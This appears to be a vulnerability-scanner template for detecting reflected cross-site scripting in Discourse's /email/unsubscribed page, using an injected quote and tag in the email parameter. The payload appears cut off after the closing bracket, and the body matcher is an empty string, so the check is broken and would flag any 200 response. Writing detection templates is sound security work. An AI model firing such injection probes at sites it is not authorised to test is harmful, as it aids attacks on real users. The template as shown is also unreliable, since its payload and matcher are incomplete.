id: Discourse XSS info: name: Discourse CMS XSS author: madrobot severity: medium requests: - method: GET path: - "{{BaseURL}}/email/unsubscribed?email=test@gmail.com%27\">" matchers: - type: status status: - 200 - type: word words: - "" part: body